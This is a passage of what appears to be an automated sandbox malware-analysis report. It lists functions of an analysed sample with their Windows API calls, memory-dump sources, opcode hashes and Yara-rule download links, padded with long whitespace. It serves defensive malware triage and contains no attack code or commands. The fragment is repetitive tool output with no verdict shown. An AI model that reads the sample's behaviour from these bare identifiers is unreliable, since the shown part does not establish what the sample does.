                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803779352.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803862064.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803898756.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803898756.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803971158.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _malloc$AllocateHeap
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 680241177-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 04C0F338 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46processCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 04C0F392
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1808845006.0000000004C0D000.00000040.00000020.00020000.00000000.sdmp, Offset: 04C0D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_4c0d000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: D
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 963392458-2746444292
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 4f78463fcc51ba8bfe754f1ec18d49dab538cbca16649063d724483151500864
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a553608dcef72a712f55ffbbbb1ce2d429d0b2f38d9c0713f56535d576000a2b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f78463fcc51ba8bfe754f1ec18d49dab538cbca16649063d724483151500864
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B501E871A40308AADB30DFE1CC49FEE7779AB44701F408509AA159A180EAB4A6489B65
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040F110 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1803702592.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803687522.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803757173.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803779352.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803862064.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803898756.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803898756.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803971158.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045E17D Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1803702592.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803687522.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803757173.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803779352.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803862064.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803898756.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803898756.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1803971158.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 04C0D8E8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 04C0D8F3
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1808845006.0000000004C0D000.00000040.00000020.00020000.00000000.sdmp, Offset: 04C0D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_4c0d000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 30c8350a7cf184a27d8d618e16f691e91d0b72fa80c3d30fc9a7d90b520a5421
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80E08C31A0520CEBCB10CFE89909AAD73A9AB08320F008655A807C32C0E931AB00E664
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 04C0D8B8 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 04C0D8C3
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1808845006.0000000004C0D000.00000040.00000020.00020000.00000000.sdmp, Offset: 04C0D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_4c0d000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ef8ae9b5326f5f2221ff0cb1b5b9b40320f96edcbaec9b7e00cc33ac8c200bc6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0DD05E3090520CABCB20CEE4990499A73A8DB05321F008754E916832C0D531AA009790
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 04C0F2A4 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(000001F4), ref: 04C0F2B9
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1808845006.0000000004C0D000.00000040.00000020.00020000.00000000.sdmp, Offset: 04C0D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_4c0d000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 014d7131c1f17daf356c68379e93802adb062659d610f1651edc4cbc50371297
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4E0BF7494010DEFDB10EFA4D5496ED7BB4EF04301F1045A5FD05D7680DB709E548A62
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 04C0F2A8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(000001F4), ref: 04C0F2B9
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1808845006.0000000004C0D000.00000040.00000020.00020000.00000000.sdmp, Offset: 04C0D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_4c0d000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 90de610d0db695efce77d3fb17093153f6cd50d84718d7f8abaa8fbc7d03e985
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EEE0E67494010DDFDB00EFB4D5496AD7BB4EF04301F104565FD01D2280D6709D508A72